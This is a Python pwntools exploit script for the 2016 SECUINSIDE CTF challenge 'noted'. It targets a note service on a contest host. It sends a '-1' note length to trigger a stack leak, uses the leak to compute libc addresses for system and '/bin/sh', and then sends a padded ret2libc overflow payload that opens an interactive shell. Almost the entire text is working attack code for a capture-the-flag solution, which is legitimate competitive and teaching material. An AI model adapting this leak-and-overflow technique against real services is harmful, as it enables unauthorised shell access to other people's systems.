2016 SECUINSIDE CTF — "noted" (exploit script)
by St1tch
from pwn import *
import stitch
# Written for Python 2 / the str-based pwntools API (raw_input, str tubes).
# Toggle: True exploits a copy of the service on localhost (pausing first so a
# debugger can be attached); False goes against the live challenge host.
local = False

# (host, port) plus the libc offsets matching each target's libc.  'read35' is
# presumably read()+0x23, the libc return address that the stack leak in main
# recovers; 'binsh' is the "/bin/sh" string -- confirm both against the libc
# actually in use before trusting the computed base.
_TARGETS = {
    True: (('localhost', 9999),
           {'read35': 0xd5c23, 'system': 0x3ad80, 'binsh': 0x15ba3f}),
    False: (('chal.cykor.kr', 20003),
            {'read35': 0xd4443, 'system': 0x3a920, 'binsh': 0x15909f}),
}
_addr, offset = _TARGETS[local]
s = remote(*_addr)
if local:
    raw_input('ready!')
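def reg_login(menu, myid, mypw, conn=None):
    """Drive the register/login menu of the note service.

    The service prints a menu that ends in a blank line, then two prompts
    (each ending in ' : ') for an id and a password.  Everything is sent
    verbatim; nothing is validated or returned.

    Args:
        menu: menu choice sent as-is ('2' registers, '1' logs in -- see main).
        myid: user id sent at the first prompt.
        mypw: password sent at the second prompt.
        conn: pwntools tube to talk to; defaults to the module-level `s`
            so existing callers are unaffected.
    """
    if conn is None:
        conn = s
    conn.recvuntil('\n\n')
    conn.sendline(menu)
    conn.recvuntil(' : ')
    conn.sendline(myid)
    conn.recvuntil(' : ')
    conn.sendline(mypw)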
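def n_write(title, d_len, pw, conn=None):
    """Create a note via menu item 2.

    Sends the title, the note length and the note password at the three
    ' : ' prompts.  `d_len` is sent verbatim as text: main passes '-1',
    which is presumably what the service mishandles (a negative length
    accepted as a size) and what sets up the later stack leak/overflow --
    the server side is not visible here, so treat that as unconfirmed.

    Args:
        title: note title; main later searches the leak for its first bytes.
        d_len: note length, as a string.
        pw: note password, required again to edit the note.
        conn: pwntools tube; defaults to the module-level `s`.
    """
    if conn is None:
        conn = s
    conn.recvuntil('\n\n')
    conn.sendline('2')
    conn.recvuntil(' : ')
    conn.sendline(title)
    conn.recvuntil(' : ')
    conn.sendline(d_len)
    conn.recvuntil(' : ')
    conn.sendline(pw)
    log.info('Write note! %s' % title)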
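def n_edit(title, title_pw, payload, conn=None):
    """Edit a note via menu item 4 and return what the service printed
    before asking for the new content.

    After the title and password prompts the service echoes output up to
    the 'size) : ' prompt; that echo is what main parses as a stack leak
    (with the '-1'-sized note it runs past the note buffer).  `payload`
    is then sent as the new content.

    Side effect: a non-empty `payload` is treated as the final exploit --
    the tube is handed to the user with interactive() before returning,
    so the call only returns once that session ends.  An empty payload is
    the leak-only mode used by main.

    Args:
        title: title of the note to edit.
        title_pw: password given when the note was written.
        payload: new note content; '' for leak-only.
        conn: pwntools tube; defaults to the module-level `s`.

    Returns:
        The raw data received between the password prompt and 'size) : '.
    """
    if conn is None:
        conn = s
    conn.recvuntil('\n\n')
    conn.sendline('4')
    conn.recvuntil(' : ')
    conn.sendline(title)
    conn.recvuntil(' : ')
    conn.sendline(title_pw)
    leaked = conn.recvuntil('size) : ')
    conn.sendline(payload)
    log.info('Edit note! %s' % title)
    if payload:
        log.info('Exploit!')
        conn.interactive()
    return leaked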
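if __name__ == '__main__':
    myid = mypw = 'stitch'
    title = title_pw = 'ukuk'
    reg_login('2', myid, mypw)  # register
    reg_login('1', myid, mypw)  # login
    log.info('login %s' % myid)

    # Note with length '-1': presumably accepted by the service and then used
    # as an (unsigned) size, which is what makes the edit step both dump the
    # stack and let the final payload overflow it -- confirm against the binary.
    n_write(title, '-1', title_pw)

    # Leak: with an empty payload n_edit just returns the service's echo of
    # the note, which runs past the buffer into the stack.
    stack = n_edit(title, title_pw, '')
    # stitch.dump_str(stack)
    anchor = stack.find('uk')
    if anchor < 0:
        # Without the title marker the slice below would silently read from
        # index 131 and every derived address would be garbage; stop here.
        raise SystemExit('title marker not found in leaked data; leak failed')
    # 136 bytes past the title marker ends the 4-byte slot holding the libc
    # return address (presumably read()+0x23); the distance was found
    # empirically with the dump above.
    ebp = anchor + 136
    read35 = u32(stack[ebp - 4:ebp])
    d_offset = read35 - offset['read35']  # libc load base
    system = d_offset + offset['system']
    binsh = d_offset + offset['binsh']

    # Classic 32-bit ret2libc: pad up to the saved return address (1164 bytes,
    # found empirically), then system(), a 4-byte dummy return address, and
    # the pointer to "/bin/sh" as system()'s argument.
    pay = 'a' * 1164
    pay += p32(system)
    pay += 'a' * 4
    pay += p32(binsh)
    n_edit(title, title_pw, pay)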